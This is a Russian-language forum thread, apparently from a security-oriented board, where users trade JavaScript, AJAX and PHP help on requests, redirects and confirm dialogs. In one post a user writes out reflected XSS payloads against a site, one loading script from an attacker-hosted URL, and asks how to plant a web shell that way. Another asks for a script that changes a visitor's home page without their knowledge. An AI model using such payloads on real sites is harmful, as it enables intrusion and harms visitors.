[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    В этой теме задаем вопросы непосредственно про Javascript и Ajax !!!

    Все коды выкладываем в теге [.code] либо [.html]
     
    #1 banned, 9 Jun 2007
    Last edited: 3 Aug 2008
    3 people like this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    HTML:
    <script>
    function none() { };
    function make_sync_request(url) {
      var r;
      if (window.XMLHttpRequest) {
        r = new XMLHttpRequest();
        r.onreadystatechange = none;
        r.open("GET", url, false);
        r.send(null);
        }
      else if (window.ActiveXObject) {
        r = new ActiveXObject("Microsoft.XMLHTTP");
        if (!r)
          r = new ActiveXObject("Msxml2.XMLHTTP");
        if (r) {
          r.onreadystatechange = none;
          r.open("GET", url, false);
          r.send(null);
          }
        }
      document.getElementById('txt').innerHTML=responceTEXT;
      }
    </script>
    <input type='button' onClick="make_sync_request('xx.php')"
    value='second' />
    <br/>
    <div id='txt'></div>
    Что не так?
    По нажатию на кнопку должен быть инклуд файла xx.php
     
    4 people like this.
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    2Isis
    Code:
    responceTEXT
    замени на
    Code:
    r.responseTEXT
     
    1 person likes this.
  4. RevenAnt

    RevenAnt Elder - Старейшина

    Joined:
    8 Apr 2005
    Messages:
    60
    Likes Received:
    18
    Reputations:
    9
    А потом ещё и на "r.responseText" ^_^
    Регистрозависимое однако.
     
    1 person likes this.
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,857
    Likes Received:
    1,961
    Reputations:
    594
    Кароче есть функция:
    Code:
    function changePage() {
    		document.getElementById( "ifrm" ).src = sites[currentPage];
    	 }
    
    Вызываем в теле функцию:
    Code:
    <body onload="changePage()">
    	<iframe id="ifrm" src=""/>
      </body>
    
    и получаем в Ифрейме нужную страничку.

    А мне хотелось бы не в Ифрейме, а просто перенаправить на неё юзера. И открыть в этом же (не в новом) окне. Как реализовать?
     
  6. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    location.href = sites[currentPage]; ?
     
    5 people like this.
  7. Darkweider

    Darkweider Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    142
    Likes Received:
    13
    Reputations:
    0
    Ajax с чего начать ? Есть что-нибудь на русском почитать? ТЕхнология хорошая но имеет свои минусы... Надо изучать... Кто-нибудь знает где можно почитать про Ajax на русском, с англ. переводить влом.
     
  8. Doger

    Doger New Member

    Joined:
    8 May 2007
    Messages:
    5
    Likes Received:
    4
    Reputations:
    0
    Вообщем нужен скрипт делающий такую вещь как автопереход.
    но при этом автопереход должен делаться наобум или по очерёдно на одну из 10ссылок.
     
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Doger, легче такое сделать на пхп....
    PHP:
    <?php
    $per 
    file_get_contents('links.txt');
    echo 
    "<html><head><meta http-equiv='refresh' content='0; URL=".$per[array_rand($per)]."'></head></html>";
    ?>
    При этом в файле links.txt
    Построчно должны стоять линки на сайты ...ку да надо перейти..
    links.txt
    Code:
    http://www.xeka.ru
    http://www.antichat.ru
    http://www.gemaglabin-xeka.ru
    Сколько хочешь столько и кидай ссылок в файл
     
  10. Kridan

    Kridan Member

    Joined:
    2 Jun 2007
    Messages:
    24
    Likes Received:
    8
    Reputations:
    0
    www.ibm.com/developerworks/ru/ajax/
    Здесь посмотри.
     
    1 person likes this.
  11. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    Привет народ!

    Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
    _http://site.com/search.asp?query="><script>alert()</script>

    хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
    _http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
    Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.

    Подскажте плз...

    //ЗЫ: Со снифером дело отпадает....
     
    #11 Tw!m4, 16 Jun 2007
    Last edited: 16 Jun 2007
  12. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    Хех......)) чета я об этом даже и не подумал (о выполнение кода в браузере а не на серваке).....хм.....аякс я к сожелению не знаю.....эта значит я в пролёте? да уж....фигня какая то ((......а че можна в таком случае еще сделать?
     
  13. Макс 8===3

    Макс 8===3 New Member

    Joined:
    3 Nov 2006
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Всем привет, подскажите плиз скрипт редиректа без задержки. Есть такой :

    <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://">

    Но он всёрабно перед загрузкой нужной страницы заходит на главную....

    Спасибо!
     
  14. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    Только при помощи php или htaccess.
    PHP:
    <?php
    header 
    "Location: http://site.com" );
    ?>
     
  15. Макс 8===3

    Макс 8===3 New Member

    Joined:
    3 Nov 2006
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Понял, спасибо! впринципе уже добился чего хотел, а ещё такой вопрос. Подскажите скрипт который добавляет нужную страницу на стартовую страницу, и\или в избранное без ведома юзера!!!!
     
  16. Raz0r

    Raz0r Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    126
    Likes Received:
    20
    Reputations:
    0
    Макс 8===3, кстати, редирект можно и с помощью JS замутить, и будет, вроде как без задержки.
    PHP:
    <script language="JavaScript">
     
    document.location.href "http://someshit/";
    </script>
    Правда в случае отключенного JS, ясен, не покатит, так-что PHP вариант рулит ;) но раз уж тут тема про JS решил запостить.
     
  17. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    Каким образом можно сделать подтверждение нажатия на ссылку? Дайте пример
     
  18. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    Code:
    <script type='text/javascript'>
    function check(url){
    if(confirm("да?")){
    document.location=url;
    }else{
    alert('нет так нет');
    }
    }
    </script>
    <a href='javascript://' onClick="check('next.page)">123</a>
    
     
  19. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    че-то непашет)) наверно из-за неправильного кода в a href
     
  20. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    ну ковычку сами догадаетесь поставить.
     
Loading...
Thread Status:
Not open for further replies.